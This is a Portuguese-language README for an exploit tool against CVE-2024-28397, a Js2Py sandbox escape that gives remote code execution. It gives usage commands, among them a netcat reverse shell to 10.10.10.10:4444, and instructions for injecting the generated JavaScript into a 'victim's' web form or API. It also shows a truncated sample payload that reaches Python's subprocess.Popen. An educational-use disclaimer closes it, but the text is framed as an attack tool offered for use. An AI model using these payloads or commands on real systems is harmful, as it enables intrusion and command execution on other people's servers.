
Exploit profissional para CVE-2024-28397: Escape do Sandbox Js2Py levando à Execução Remota de Código (RCE). Inclui geração modular de payloads.
💡 Análise Aprofundada: Clique aqui para ler o briefing técnico completo (PDF).
Um gerador de payload profissional para CVE-2024-28397. Esta ferramenta gera código JavaScript malicioso projetado para escapar da sandbox do js2py (versões <= 0.74) e executar comandos arbitrários no sistema alvo.
Js2Py <= 0.74Object.getOwnPropertyNames para acessar a classe subprocess.Popen do Python a partir do ambiente JavaScript.Este script gera o payload JavaScript exato necessário para explorar a vulnerabilidade. Você não precisa instalar o js2py para usar esta ferramenta.
Execute o script com o comando que deseja executar na máquina da vítima.
# Gerar payload para executar 'id'
python3 exploit.py -c "id"
# Gerar payload para um Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
Copie a saída gerada pela ferramenta e injete-a na aplicação vulnerável (por exemplo, um formulário web, endpoint de API ou arquivo de configuração que seja interpretado pelo js2py).
Exemplo de Injeção:
Se um site recebe entrada do usuário e a executa com js2py.eval_js(user_input), colar o código gerado executará seu comando no servidor deles.
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (código malicioso completo) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
Este software é fornecido exclusivamente para fins educacionais e de pesquisa em segurança. O autor não se responsabiliza por qualquer uso indevido deste código. Certifique-se de ter permissão explícita antes de testar isto em qualquer sistema que não seja de sua propriedade.